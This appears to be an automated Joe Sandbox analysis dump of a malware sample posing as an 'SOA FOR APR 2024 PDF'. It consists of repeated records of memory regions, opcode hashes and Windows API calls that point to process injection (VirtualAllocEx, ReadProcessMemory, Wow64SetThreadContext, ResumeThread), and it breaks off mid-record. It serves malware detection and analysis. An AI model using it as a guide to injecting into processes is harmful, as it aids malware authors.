                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1df0da898ece7ca238e0bd2465b46a7926504c8025d5552147341fd411b9d456
                                  • Instruction ID: 3ec444656841e4604a00d58fa3aaf2cc678984f18d145a6f3302f8e967eb56e7
                                  • Opcode Fuzzy Hash: 1df0da898ece7ca238e0bd2465b46a7926504c8025d5552147341fd411b9d456
                                  • Instruction Fuzzy Hash: A02137B19002098FDB20DFAAC5857AEBBF5EF88314F14842ED459A7240DB789945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070CD198
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: c66ea88bce5051f0573ca6662b1bdf741ef616e29ff91e3075e3d87782cac0ae
                                  • Instruction ID: 7e9a9eddddc4f4bcef5dc6c89783ee7002cb4c360dc1e07e91a3666bb0735909
                                  • Opcode Fuzzy Hash: c66ea88bce5051f0573ca6662b1bdf741ef616e29ff91e3075e3d87782cac0ae
                                  • Instruction Fuzzy Hash: D92125B19003499FCB10DFAAC984AEEBBF5FF48310F10842AE919A7250C7389944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070CD198
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 794ad9cfcec1fa020a5b9eea5c7af2443de0c3c721ecfef10ab04aa498cb3a7a
                                  • Instruction ID: 44584d03c41fc97b3cbceae70401c047ed374c2f8efb753d5dd081fd05b84c33
                                  • Opcode Fuzzy Hash: 794ad9cfcec1fa020a5b9eea5c7af2443de0c3c721ecfef10ab04aa498cb3a7a
                                  • Instruction Fuzzy Hash: 362114B19002499FCB10DFAAC984AEEBBF5FF48310F10842AE919A7250D7389944CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070CCF0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 5e27f67b76bc20ae18d9306f69ab45db7f5d47011e2de934db04b452ff847bba
                                  • Instruction ID: 9ffd3adeb6cc5ad54d655402dc5f31a26a0185de83fa25af1aaeade1ae8f9370
                                  • Opcode Fuzzy Hash: 5e27f67b76bc20ae18d9306f69ab45db7f5d47011e2de934db04b452ff847bba
                                  • Instruction Fuzzy Hash: B82115B19003098FDB10DFAAC5857AEBBF4EF48324F14842ED559A7240DB78A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1DAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a0d1c07def5f30ee716532e34c819cfb53cc608a1170a10e0cd4e559693f3a62
                                  • Instruction ID: 80114ef202e844c266147a47a07ec20d50f7a68e6d77e48618eb7fb8de938f97
                                  • Opcode Fuzzy Hash: a0d1c07def5f30ee716532e34c819cfb53cc608a1170a10e0cd4e559693f3a62
                                  • Instruction Fuzzy Hash: B321C4B59002489FDB10CF9AD984ADEBBF9FF48310F14841AE918A3350D378A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B841,00000800,00000000,00000000), ref: 00E1BA52
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 07b3c15a15f399e7dcc7acc4c00a56aefa16940fbc4482716eff641f8648c300
                                  • Instruction ID: 33ff6232f5f7c53fd082e1ed800aaed1bf123d1f94b3c644ed665d499519a5bc
                                  • Opcode Fuzzy Hash: 07b3c15a15f399e7dcc7acc4c00a56aefa16940fbc4482716eff641f8648c300
                                  • Instruction Fuzzy Hash: BA1114B69003088FCB20CF9AC444ADEFBF8EF88310F10842AE519B7210C379A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070CCFD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 7322388863c592f04ad8a535bf9e98a807bed3498e899553d16e3d8d6823c97c
                                  • Instruction ID: 1ffd317f13f067d7f5128d907668512e31e7b03797e00a72039f08982b9205c3
                                  • Opcode Fuzzy Hash: 7322388863c592f04ad8a535bf9e98a807bed3498e899553d16e3d8d6823c97c
                                  • Instruction Fuzzy Hash: 331117B19002499BDB20DFAAC944AEEBBF5EF88310F14881AE519A7250CB759545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B841,00000800,00000000,00000000), ref: 00E1BA52
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: daa1e1f8b48b403ed3b02f798778c694d7bcf757c4bc3a8f7f63c8bec24b1e2a
                                  • Instruction ID: ae98cbaa2582fafd302a1244e652a484e3ecd0d79ecf82da0f7b7aa7d222de75
                                  • Opcode Fuzzy Hash: daa1e1f8b48b403ed3b02f798778c694d7bcf757c4bc3a8f7f63c8bec24b1e2a
                                  • Instruction Fuzzy Hash: FA1112B69003498FDB20CF9AC448ADEFBF4EF88310F10842AD429A7210C379A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070CCFD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: ec3fc9f0400f74a6c9d0360b441106fe8602045863ec9ddd0f86816e3e4a0606
                                  • Instruction ID: 2dcf1378f24bea6a9c6435b26b3652659f253e3b7c4a0892f6b3bdeff6482e9d
                                  • Opcode Fuzzy Hash: ec3fc9f0400f74a6c9d0360b441106fe8602045863ec9ddd0f86816e3e4a0606
                                  • Instruction Fuzzy Hash: F91149B19002499FDB20DFAAC944AEFBFF9EF48320F108419E519A7250C779A540CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 07ef7349d6c13ef1cb444964246ad90a0d5a3b199298d1afbd7c2b6ed7c44282
                                  • Instruction ID: ff5bfb6eda3dd66cfbeb7a806a7f89a80dc1dd1d3027c0799a2f250de47d7658
                                  • Opcode Fuzzy Hash: 07ef7349d6c13ef1cb444964246ad90a0d5a3b199298d1afbd7c2b6ed7c44282
                                  • Instruction Fuzzy Hash: CE1158B19003488BDB20DFAAC8447AFBBF5EF88324F20841AC519A7240CB789944CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 6016cc922571850e814e82eb5ad414ab978cb85df4f9430414e59a9400645936
                                  • Instruction ID: 44f507a013107777a4c971b08f82765a902904222b29509f22afc5184dc17102
                                  • Opcode Fuzzy Hash: 6016cc922571850e814e82eb5ad414ab978cb85df4f9430414e59a9400645936
                                  • Instruction Fuzzy Hash: C51128B19003498BDB24DFAAC5457AFFBF5EF88324F108419D519A7240CB79A944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E1B7C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 58923a3e0f98c1203b4003d53d1cd8c12c50c78b64861ba4e0e9268e79534d32
                                  • Instruction ID: 806d5605d3ccc7acf9fdaed9c26bcfd06ac5acd93214e3874d17aca6c9d97576
                                  • Opcode Fuzzy Hash: 58923a3e0f98c1203b4003d53d1cd8c12c50c78b64861ba4e0e9268e79534d32
                                  • Instruction Fuzzy Hash: 29110FB5C002498FCB20DF9AC444ADEFBF8EF88324F10851AD418B7640C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D3B1865
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 853fd2d083e81040fab2c7fe808eb6e1cbe0e44ae92b7767837d33ce443aa0a2
                                  • Instruction ID: fe0e70532f1e17878a32d861e657d9a7b57ed7ed218ec1e675a9578d1a91f0f3
                                  • Opcode Fuzzy Hash: 853fd2d083e81040fab2c7fe808eb6e1cbe0e44ae92b7767837d33ce443aa0a2
                                  • Instruction Fuzzy Hash: BC1122B5800348CFCB20DF9AC888BDEBBF8FB48324F10841AD558A3610C378A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 0D3B1865
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2078358468.000000000D3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D3B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d3b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 78e4f8946354bfcf9d329dabe9f17fb761683f6deb36ebd2a7a5e5fb3fd12e96
                                  • Instruction ID: 620526238fcbc6f877912208f63796052a9180ae40ca99579f480dd5540e24da
                                  • Opcode Fuzzy Hash: 78e4f8946354bfcf9d329dabe9f17fb761683f6deb36ebd2a7a5e5fb3fd12e96
                                  • Instruction Fuzzy Hash: C711D3B58003499FDB10DF9AC985BDEBBF8FB48324F10845AD558A7650C379A544CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
                                  • Instruction ID: dcc433e492858bffb182ff42580dfa13c1f4964c9781a06b7247720fd7e555fa
                                  • Opcode Fuzzy Hash: 3ac56ea675b23e6dc9ae9e3eeee882a7f1c65e7f42dbf8979f6ed3f8334b3535
                                  • Instruction Fuzzy Hash: 12213771904240DFCB05DF14D9C0F26BF66FB9A318F24C569E94A0B656C33AD816DBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
                                  • Instruction ID: fa68b228c95e00855ce608326d25d134f623c7b2c1e725640bc2ed2d8e32887f
                                  • Opcode Fuzzy Hash: 9235ee3fd0135d95eed318925fa7555d78d3d5f6e2f6a93f2b1a4cb9dcd3af84
                                  • Instruction Fuzzy Hash: 3021F275604204DFCB14EF24D984B66BF66FB88314F24C569E94A4B296D33AD807CA71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
                                  • Instruction ID: 3bc465490eca4cc7062681e744b6b4cff0fd8130cdabfd1cb3b84ca1a53b21e8
                                  • Opcode Fuzzy Hash: 8d0045d99a73de67198c2c9c69cf7e505f257ac6ba06b7d0abd91f00d3bb2b9f
                                  • Instruction Fuzzy Hash: 18210471504284EFDB05DF24D9C0F66BBA6FB88314F24C56DE94A4B296D33AD806CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6931329aba923d8a10e0f90d65263030b7a42586e4c810d105389d167e5b41d5
                                  • Instruction ID: d3953349114e4f176f4660de2433f95e8cb3eaa9eb7ab9dd81fde747b11d19d9
                                  • Opcode Fuzzy Hash: 6931329aba923d8a10e0f90d65263030b7a42586e4c810d105389d167e5b41d5
                                  • Instruction Fuzzy Hash: FB218E75509380CFCB02DF24D994715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 07c6449b63fb9caf58b6728c37f0d85f9493805394c8f55442cf54c455b81ec1
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: C9112672804280CFCB02CF10D5C4B16BF72FB99314F28C6A9D84A0B656C336D85ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 2716b3712a9edc6e0d9c0d173526ef557b193b5970df3933e63c60b903268b09
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 0111BB75504280DFCB02CF10C5C4B15BFA2FB84314F28C6A9D84A4B296C33AD80ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1a15b4762cce63673146ef8c397b38297940212713da5e38c1255457645c3eb
                                  • Instruction ID: 37b30eb351aa2fc20c66be581e2eb9b0e240fb9208c83b05024a400956fb7aa1
                                  • Opcode Fuzzy Hash: d1a15b4762cce63673146ef8c397b38297940212713da5e38c1255457645c3eb
                                  • Instruction Fuzzy Hash: 9E0126710043409AE7248F29CD84B67BF9DEF47324F28C92AED4B4A696D279DC40CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84d71fb5c1652cadac1a385c93670f47798fa2bd527b21eced80007b94b51805
                                  • Instruction ID: e229c5aeb7de8005df4886e560f368b38057044fc685e1639ef0453ccf1d4b92
                                  • Opcode Fuzzy Hash: 84d71fb5c1652cadac1a385c93670f47798fa2bd527b21eced80007b94b51805
                                  • Instruction Fuzzy Hash: 99F096714043449EEB248F16CCC8B62FF98EF56734F18C55AED4A4B696C2799C44CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T+-q$[V~*$[V~*$]\`
                                  • API String ID: 0-1849991408
                                  • Opcode ID: 0b6f3f1460400ba79407d6541b407f35d4cf8692b61d8864e0bd054ced07eea0
                                  • Instruction ID: 69d62fe741a47cf9cebde8c6fe3cc8181551bf4d75aafdd1e12fbde44c0d15fb
                                  • Opcode Fuzzy Hash: 0b6f3f1460400ba79407d6541b407f35d4cf8692b61d8864e0bd054ced07eea0
                                  • Instruction Fuzzy Hash: EDB1E5B0E2561ADBDB04CFAAD98089EFBF2FF89300F14D62AD415BB258D33099058F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T+-q$[V~*$]\`
                                  • API String ID: 0-3978741314
                                  • Opcode ID: 4a707dbf5e1a8b9e0833f89185e3f260b2a5f4f08b7290ee3c9646e541fe98a8
                                  • Instruction ID: aecdb4c3f85f38de8988a85916a686e3b09a64ee8cdec55fffa41d764419252a
                                  • Opcode Fuzzy Hash: 4a707dbf5e1a8b9e0833f89185e3f260b2a5f4f08b7290ee3c9646e541fe98a8
                                  • Instruction Fuzzy Hash: CAB1F6B0E2521A9FDB04CFAAD98089EFBF2FF89300F14D62AD415BB259D73099058F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M|G}
                                  • API String ID: 0-2220694155
                                  • Opcode ID: 4edf8223191fa2b091298a4a50c23fd1da1ae7efb9fc020e0f936493f4c914e1
                                  • Instruction ID: 45cbb219094fd8437502eb9b85a69d327175cc4f43e2acbf800e43a281cf69f8
                                  • Opcode Fuzzy Hash: 4edf8223191fa2b091298a4a50c23fd1da1ae7efb9fc020e0f936493f4c914e1
                                  • Instruction Fuzzy Hash: D7E11EB4E002198FDB14DFA9C6819AEFBF2FF89315F248259D419A735AD730A941CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abf0a88e56e5b083decfd86cfa05b68751e6e598219814d10166d84db146baed
                                  • Instruction ID: e862151d3ee793e4a7f5860f982125f7f65c477073264c0ea708b49c35652100
                                  • Opcode Fuzzy Hash: abf0a88e56e5b083decfd86cfa05b68751e6e598219814d10166d84db146baed
                                  • Instruction Fuzzy Hash: 5D1280B2401F4A8EE310CF66ED4C18A7EB1BB85318BA15609D2617B3F5DBB9158ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9652089ac09b8908348acdf3a70e407fbaedad8d6bfcbcae51bc5592f854234
                                  • Instruction ID: 48cae0a85cf3e3a469c1146f292a96c558708469d1f7028d9512a363152d4a8a
                                  • Opcode Fuzzy Hash: f9652089ac09b8908348acdf3a70e407fbaedad8d6bfcbcae51bc5592f854234
                                  • Instruction Fuzzy Hash: D5E1C9B4E002198FCB14DFA9C6819AEBBF2BF89305F24C269D414A735AD735A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aec938529d88f030f620cea4f5a04cab4e904eb7ae7ceb033354e39fa1d9f059
                                  • Instruction ID: 6eed69342735b643a3bfa7591d3de9e749afb18e2565cabf0a7176c21a2b64bd
                                  • Opcode Fuzzy Hash: aec938529d88f030f620cea4f5a04cab4e904eb7ae7ceb033354e39fa1d9f059
                                  • Instruction Fuzzy Hash: 7BE1FDB4E002198FDB14DFA9C5809AEFBF2FF89305F248259D419AB35AD731A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f434d0686417892ffc15e62b22ac4acf28c491597591a8685880203244583c82
                                  • Instruction ID: 4910b53b195ce29106402b3d5ef2fb0f3a52d28bcd4d7995b916d06a94ed65f2
                                  • Opcode Fuzzy Hash: f434d0686417892ffc15e62b22ac4acf28c491597591a8685880203244583c82
                                  • Instruction Fuzzy Hash: 32E1ECB4E012198FCB14DFA9C5809AEFBF2BF89315F24C269D414AB35AD735A941CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5db754a64e9e657bc6d1ab88edcdaa980451081dd71d62bfc738cc27e611bce
                                  • Instruction ID: 29f5e7327083f0663bc38a3ac50a5facf8dedc05a2cf75a6748f5bdb61cf7f43
                                  • Opcode Fuzzy Hash: b5db754a64e9e657bc6d1ab88edcdaa980451081dd71d62bfc738cc27e611bce
                                  • Instruction Fuzzy Hash: A3E1FAB4E012198FCB14DF99C6809AEFBF2BF89305F24C259D415A735AD731A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50820024feda85a69abf0c45327386afbebee3e3c7bf7b7bc3072524353a7da0
                                  • Instruction ID: 2bdc5e8d78a91a776006b248f52781c025c207f8d60bdafa1e6a71b1d06df720
                                  • Opcode Fuzzy Hash: 50820024feda85a69abf0c45327386afbebee3e3c7bf7b7bc3072524353a7da0
                                  • Instruction Fuzzy Hash: 16D15931D1074A8ACB11EF64DA50A9DB7B1FF96300F10C79AE0493B665FB746AC5CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d2eb8d6343487ca7f4967b13b616a346af2b6b333c19be5785604c51a66ae48
                                  • Instruction ID: 786377b27b460d8b61bad95d12b3b22f7d3d7538bb961afd540cad4ff9be0a58
